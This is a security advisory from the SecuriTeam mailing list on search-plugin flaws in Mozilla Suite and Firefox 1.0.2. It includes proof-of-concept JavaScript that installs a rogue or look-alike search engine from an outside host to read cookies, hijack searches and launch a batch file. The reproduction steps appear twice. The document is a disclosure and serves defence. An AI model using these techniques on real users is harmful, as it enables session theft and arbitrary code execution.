The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mozilla Suite and Firefox Firesearching Vulnerabilities
------------------------------------------------------------------------
SUMMARY
The search plugin technology in Firefox is based on Apple's sherlock
files, a simple text format to syndicate a search engine interface. The
installer and parser of those files contain design bugs that allow to
create a search engine that works as a spyware tool and/or execution
vehicle for arbitrary code.
By creating a special sherlock file it is possible to run JavaScript code
in security content of the currently active tab, and to overwrite an
existed search engine without a chance for the user to see what is going
on. This vulnerabilities allow attackers to steal sessions and cookies
from the users and also to execute arbitrary code, and to make a redirect
to a site instead of the user choice of search engine.
DETAILS
Vulnerable Systems:
* Mozilla suite version 1.0.2 and prior
* Firefox version 1.0.2 and prior
Immune Systems:
* Mozilla suite version 1.0.3
* Firefox version 1.0.3
Firesearching 1:
The vulnerability allow attackers to steal information from the users,
monitor their activities and also execute arbitrary code like spyware and
other type of monitoring tools.
The demo adds a new search engine (called Firesearching) by calling
sidebar.addSearchEngine() that behaves like a normal Google search. When
searching with that engine an alert shows that the engine has JavaScript
access to the currently active tab. An attacker could silently send the
information to another host instead.
When the currently displayed site is privileged (chrome or about:config)
the demo requests UniversalXPConnect rights, creates c:\booom.bat and
launches the batch file (shows a directory listing in a dos box). This
part is Windows only, which is a limitation of the demo - the bug affects
all platforms.
Example:
To reproduce:
1. Add the search engine
2. Search for any keyword (cookie message for mikx.de)
3. Search for any keyword again (cookie message for google.com)
4. Open about:config
5. Search for any keyword again (creates c:\booom.bat and launches it)
<script language="JavaScript" type="text/javascript">
function addSearch() {
window.sidebar.addSearchEngine(
"http://www.mikx.de/firesearching/firesearching.src";,
"http://www.mikx.de/firesearching/firesearching.png";,
"Firesearching",
"Web" );
}
<a href="javascript:addSearch()">Add Firesearching demo engine</a>
Firesearching 2:
The displayed name in the confirmation dialog is given as the third
parameter of sidebar.addSearchEngine(), but the displayed name in the
search dropdown is taken from the sherlock file. This way it is possible
to overwrite the default Google search with a modified version that
monitors the data and/or waits for a chance to run code. The string
"google.src" in the source URL got also be moved out of the dialog by
supplying a really long URL to the sherlock file (the dialog just cuts the
source URL when it's getting too long).
The user will probably think the search engine installation just failed,
because after confirming the installation dialog Firefox never displays an
error messages if the installation failed because e.g. the sherlock file
is broken or not found. Since there is no UI to see details about the
installed searches a common user will probably never find out that the
default Google search got modified. Using the built in sherlock update
feature an attacker also gets a decent update mechanism to modify the
scripts beyond the initial infection.
Example:
To reproduce:
1. Add the search engine
2. Search for any keyword (cookie message for mikx.de)
3. Search for any keyword again (cookie message for google.com)
4. Open about:config
5. Search for any keyword again (creates c:\booom.bat and launches it)
WARNING: Adding the Google "look-a-like" will overwrite you original
Google search! Make sure you have a backup of you google.src. You can
visit <http://mycroft.mozdev.org/quick/google.html> mozdev.org to
re-install a real Google search.
function addGoogle() {
window.sidebar.addSearchEngine(
"http://www.mikx.de/firesearching/areallylongstringlthatmakesthedialogcuttheurltotheright...cuttheurltotheright/google.src";,
"http://www.mikx.de/firesearching/areallylongstringlthatmakesthedialogcuttheurltotheright...cuttheurltotheright/google.png";,
"Firesearching 'look-a-like'",
"Web" );
}
</script>
<a href="javascript:addGoogle()">Add Google "look-a-like" demo engine</a>
ADDITIONAL INFORMATION
The information has been provided by <mailto:mikx@mikx.de> Michael Krax.
The original article can be found at: <http://www.mikx.de/firesearching/>
http://www.mikx.de/firesearching/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
![http://www.mikx.de/firesearching/firesearching.png"](http://www.mikx.de/firesearching/firesearching.png"){kind=link}
![http://www.mikx.de/firesearching/areallylongstringlthatmakesthedialogcuttheurltotheright...cuttheurltotheright/google.png"](http://www.mikx.de/firesearching/areallylongstringlthatmakesthedialogcuttheurltotheright...cuttheurltotheright/google.png"){kind=link}